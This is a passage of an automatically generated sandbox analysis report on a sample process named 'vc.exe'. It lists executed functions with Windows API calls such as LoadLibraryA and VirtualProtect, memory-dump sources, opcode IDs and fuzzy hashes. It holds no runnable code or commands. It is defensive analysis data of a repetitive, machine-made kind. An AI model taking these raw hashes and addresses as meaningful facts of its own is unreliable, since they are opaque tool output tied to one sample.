                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5641AEB1A042599FDB00CFA8D844B9EFFB5FB48314F14816AEA04AB381DB749940CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EBC874, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentConsoleFontEx.KERNELBASE(?,?,?), ref: 00EBC96D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleCurrentFont
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2874077460-0
                                                                                                                                                                                                                              • Opcode ID: 0b8fe3e62e2e1e0901a13c0c18ca136f9c8b592e375c65e127892890cc059bc3
                                                                                                                                                                                                                              • Instruction ID: 53e338dccbfacf5e711f09e78b5fd763e16fe176701fb5ec8e086c958d1ecd5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b8fe3e62e2e1e0901a13c0c18ca136f9c8b592e375c65e127892890cc059bc3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B41F071904328DEEB20CF65C881BDEBBB1BB49304F5081A9D50CBB241DB755E89CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EBDA08, Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: f70b2704655c5cc9c9467a6ae7d546a9669557b57543ad76f264570f6327b674
                                                                                                                                                                                                                              • Instruction ID: 0a97fab03f5a04b81553940998c3c412219d537e0014d4b7d4064c572e1127e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f70b2704655c5cc9c9467a6ae7d546a9669557b57543ad76f264570f6327b674
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D3138B1D04249AFCB00DFA9D884ADEFBB5FF48314F10856AD918E7241E774AA45CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EBD464, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 00EBDAE2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: de49fd9252365a0b93d7b98f7534af61fa4a1db1114acbb77ff4e4c187bd30ea
                                                                                                                                                                                                                              • Instruction ID: 78e6fce98c23843930efe697562876d21b572275eec046fc0642dcd135918da7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de49fd9252365a0b93d7b98f7534af61fa4a1db1114acbb77ff4e4c187bd30ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 431106B1D042599FCB10CFAAC4447DEFBB4BB48324F508169D518B7240E378A944CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EB9CF0, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00EB9D68
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 8b53f142b8a5bda97a3193f673c4a18a4443f69f681a827733c718a7b1238c6b
                                                                                                                                                                                                                              • Instruction ID: 8b4479bbfa1a566f33b3556e28b5229613bc03afe9007e27a85f43c088276166
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b53f142b8a5bda97a3193f673c4a18a4443f69f681a827733c718a7b1238c6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 342147B1D006599BDB10CFAAD844BDEFBB4FB49314F10811AD919B7740D774A944CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EB7644, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00EB9D68
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 99bc95406141f1530a75352131b786d2fc5dd257754be01c6fdd08c767dd4c41
                                                                                                                                                                                                                              • Instruction ID: f69e9be4c44b613863cf5dbdc6e6ce20c214129945d9cc0ef43698d59c38948c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99bc95406141f1530a75352131b786d2fc5dd257754be01c6fdd08c767dd4c41
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D2133B1D006599BCB10CFAAD444BDEFBB4FB49314F10812AD919B7340D774A904CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EBDA70, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 00EBDAE2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: 7da1cb2b9e96b4243e78e605c2d83c2fd5b9f6a798415b82136e86e8205582e2
                                                                                                                                                                                                                              • Instruction ID: bdb1ea53c03c7e7829392abdcb13c5a91d204a4bb203b7b369e120d3447fd1d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da1cb2b9e96b4243e78e605c2d83c2fd5b9f6a798415b82136e86e8205582e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 071114B1D0025A9FDB10CF9AC884BDEFBB4BB48324F10812AD518B7240D378A945CFE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Analysis Process: vc.exe PID: 4896 Parent PID: 1560 vc.exeCOMMON

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 02AC96D0, Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02AC9916
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: eeb29e34a280e64b2268830c46bb1bcaddd49fa85da177b966b74e58391479e2
                                                                                                                                                                                                                              • Instruction ID: 9935df09d512867a1e5e898fe62b0106fe0e02184a3fc1cb1320020539d05b9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eeb29e34a280e64b2268830c46bb1bcaddd49fa85da177b966b74e58391479e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11710270A00B068FDB24DF6AD58576BBBF5FB88304F10892DD44ADBA40EB75E9058F91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02AC5635, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02AC56F1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                                              • Opcode ID: a6b76a8c4a23424c9f6976289838a4fd62d8e9a95f57f7c68145de7ba8140906
                                                                                                                                                                                                                              • Instruction ID: 96441fba2a4781e47ccb346ee90beb3995c15cf7ddcbdd23c400bc183fba17c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6b76a8c4a23424c9f6976289838a4fd62d8e9a95f57f7c68145de7ba8140906
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3441D271C00258CFEB24DFA9C9847CEBBB5BF49308F608569D408BB251DB756986CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02AC4104, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02AC56F1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                                              • Opcode ID: c35c06ac50b0afb1b9e0f1146203bae566ed5d02ed6b427860d9f6e6ce16ea4f
                                                                                                                                                                                                                              • Instruction ID: 591e4d40b2cc22ee2843a6f14aea25df3bf79eeb52cbbc7cd5d9281c514c3286
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c35c06ac50b0afb1b9e0f1146203bae566ed5d02ed6b427860d9f6e6ce16ea4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4641F270C00658CBEB24DFA9C8847CEBBB5BF49308F608569E408BB251DB756946CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 05032650, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05032711
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.531390848.0000000005030000.00000040.00000001.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallProcWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2714655100-0
                                                                                                                                                                                                                              • Opcode ID: 398aec99ef9b49b401ffb50cfc9c3d7f8b78fdf595334b93bbfbe8ccef4225b8
                                                                                                                                                                                                                              • Instruction ID: e03010f894682cd7d74b1d0389b257af305b7c82457cfc3ee673563abe103528
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 398aec99ef9b49b401ffb50cfc9c3d7f8b78fdf595334b93bbfbe8ccef4225b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D4138B8A003458FDB10CF99C588AAEBBF9FF89314F248459D419AB321D374A841CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 072314BC, Relevance: 1.6, APIs: 1, Instructions: 92libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 07231FAC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: c89d21dc79e56c6c1c7efa71481d520f73646f48f4fc3b0ad29557b5400e15e1
                                                                                                                                                                                                                              • Instruction ID: a105a9d6f35be546fbcaeeef2b618ba9f06e1940d1d295225c31cc0ffc8e01a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c89d21dc79e56c6c1c7efa71481d520f73646f48f4fc3b0ad29557b5400e15e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF3124F0D20B5E9FDB10CFA9C98479EBBF5BB48314F148129E819AB244D7749845CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 07231ECF, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 07231FAC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: 2247e76067ee7530afcabffae59af3e2ee286219a1495cac0afdadaa455c783b
                                                                                                                                                                                                                              • Instruction ID: ca1af5aca4944f93ebaa8ad7409c836d86a479ad1d6fd209697fa096bb43b514
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2247e76067ee7530afcabffae59af3e2ee286219a1495cac0afdadaa455c783b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 163134B0D2075ACFDB10CFA9C98479EBBF5BF48314F148129E819AB284D7749846CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02AC9170, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AC9991,00000800,00000000,00000000), ref: 02AC9BA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: b90cd662ad1ce27d3cc71e76b500d8648ec9fbf4c44e196409bcdd2de61f46e2
                                                                                                                                                                                                                              • Instruction ID: d709c858a586fbf0f786ed93b19eff8ba920803bd96df542787d3b09ccf58b5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b90cd662ad1ce27d3cc71e76b500d8648ec9fbf4c44e196409bcdd2de61f46e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7218BB68043899FEB10CFA9C485AEFBBF4EB49314F14805ED515AB241C7349506CFA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 07232190, Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 0723223B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 6eaf8d75120e9a031531b9dddaf72c4a83996d7d43042e5e7610a3e916fb8a43
                                                                                                                                                                                                                              • Instruction ID: b86eae5bf8450c57e07bbd641bce15e157bc13aed08b52cecf97b02e7d2dbbed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6eaf8d75120e9a031531b9dddaf72c4a83996d7d43042e5e7610a3e916fb8a43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D22148B59003499FDB10DFAAC844BDEBBF4FB49314F14806AE558A7251D3389549CFA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02ACADCC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACBBB6,?,?,?,?,?), ref: 02ACBC77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: ef41a33972aed2db15f90c8c86660062d34b00a7caa953d122a68531766f7fdd
                                                                                                                                                                                                                              • Instruction ID: b21607b9a4208964074f78b0be857307a960fa8771ee0df50be70e2b0592c64f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef41a33972aed2db15f90c8c86660062d34b00a7caa953d122a68531766f7fdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C62103B5900248EFDB10CFAAD984ADEBBF8EB48324F14841AE914B7310D775A944CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02ACBBEA, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACBBB6,?,?,?,?,?), ref: 02ACBC77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: b676f539b86eaf60b5b01f3e61cb53c342e5512acf778977b3ff99dc76bfe1ec
                                                                                                                                                                                                                              • Instruction ID: 93fd70fe8f9142116caa8faa0e622bf3b54494460799d6e796a3faa1d353a53c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b676f539b86eaf60b5b01f3e61cb53c342e5512acf778977b3ff99dc76bfe1ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21E4B5900248EFDB10CFAAD584ADEFBF4FB48324F14841AE918A7310D775A945CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 072314D4, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 0723223B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 852aca28cb50bee83afd8d030451983b13b0a52910dbfdbf8b3e7585181191d6
                                                                                                                                                                                                                              • Instruction ID: f81c86d2d5c2dcc01c5b861af9aaeb53755d8bd4f90fcbb1b9c35e7cc16cf899
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 852aca28cb50bee83afd8d030451983b13b0a52910dbfdbf8b3e7585181191d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472106B5D002499FDB10CF9AD984BDEFBF4FB48320F108429E958A7240D378A945CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02AC9B31, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AC9991,00000800,00000000,00000000), ref: 02AC9BA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: f274943de27a90f97c71190ff0c0a11b45ea138a140c7a310d7cd9480b5c6bba
                                                                                                                                                                                                                              • Instruction ID: bfc366bd2c20484eb1b3687581512c29bd429856275da404f675b7a1fad2502e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f274943de27a90f97c71190ff0c0a11b45ea138a140c7a310d7cd9480b5c6bba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F51103B69002499FDB10CFAAC484ADEFBF5EB88324F10842ED919A7200C775A645CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02AC9158, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AC9991,00000800,00000000,00000000), ref: 02AC9BA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: 09e321a7c52089ae785b5e2805ff75a52b3fa6bbc5c0c07f32082c51e9967711
                                                                                                                                                                                                                              • Instruction ID: 69a7796034bd33c1e20b12f538833d65ef514908cd6941709321749b2178f976
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09e321a7c52089ae785b5e2805ff75a52b3fa6bbc5c0c07f32082c51e9967711
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F51103B69003499FDB10CF9AC484AEEFBF4EB88324F14846ED915A7200C775A545CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 02AC98B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02AC9916
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: 440d0bb1b18bb74b200a3f70f0ec1b0709ff3ffe02581eae4140364e336d727d
                                                                                                                                                                                                                              • Instruction ID: e824c0a387fc4138a26f34ea1616c1e70aa72daa4fcec5ad6b6c3ee340ae679a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440d0bb1b18bb74b200a3f70f0ec1b0709ff3ffe02581eae4140364e336d727d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B111DFB5D007498FDB10CFAAC584BDEFBF4EB88324F14845AD829A7610D778A545CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions